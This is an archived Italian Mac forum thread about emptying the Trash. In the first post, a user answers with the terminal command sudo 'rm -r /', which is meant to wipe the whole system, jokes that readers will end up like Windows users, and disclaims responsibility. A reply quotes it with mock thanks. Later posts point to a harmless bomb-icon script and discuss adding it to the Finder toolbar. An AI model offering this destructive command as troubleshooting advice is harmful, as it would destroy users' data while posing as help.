Vai al contenuto

svuotare il cestino


the_best_92

Messaggi raccomandati

speriamo non trovi il modo di formattare tutto ...:mazzodifiori:

da terminale:

sudo 'rm -r /'

inserite la vs password ... e vi troverete a far compagni ai vs amici winzozz ... :ghghgh:

N.B.

Declino ogni responsabilita' sull'uso ke se ne fa di quanto scritto sopra:p:p

Switcher since: some day in June '06

Nikon D40 + AF-S DX 18-55 G II ~ SIGMA 70-300 DG MACRO

flickr

"Solo due cose sono infinite, l'universo e la stupidità umana, e non sono sicuro della prima." (A. Einstein)

Link al commento
Condividi su altri siti

da terminale:

sudo 'rm -r /'

inserite la vs password ... e vi troverete a far compagni ai vs amici winzozz ... :mad:

N.B.

Declino ogni responsabilita' sull'uso ke se ne fa di quanto scritto sopra:p:p

Grazie mille, provo subito, non è pericoloso, vero?:fiorellino::ghghgh::ghghgh:



IOO 2.0

Link al commento
Condividi su altri siti

  • 2 settimane dopo...

c'era anche un metodo mooooolto comodo che utilizzavo, ma dopo la formattazione me lo son perso..era uno script creato da un utente di questo forum che ti metteva l'icona di una bomba e bastava cliccare lì per far svuotare il cestino...se lo ritrovate postatelo..grazie

Link al commento
Condividi su altri siti

  • 2 settimane dopo...
c'era anche un metodo mooooolto comodo che utilizzavo, ma dopo la formattazione me lo son perso..era uno script creato da un utente di questo forum che ti metteva l'icona di una bomba e bastava cliccare lì per far svuotare il cestino...se lo ritrovate postatelo..grazie

Era uno script fatto apposta da un utente, lo trovi QUI

Link al commento
Condividi su altri siti

ceerto, è semplicissimo! basta trascinare l'applicazione sulla barra del Finder, puoi anche cambiare l'icona, io per esempio ho messo un teschio al posto della bomba che non mi piaceva per niente. ciao

uff non dire così che mi sento più impedito..ho preso la bomba e trasciata nella cornice alta del finder (per intenderci vicino allo spazio della ricerca) ma non si mette..:ghghgh:

Link al commento
Condividi su altri siti

Archiviato

Questa discussione è archiviata e chiusa a future risposte.

×
×
  • Crea Nuovo...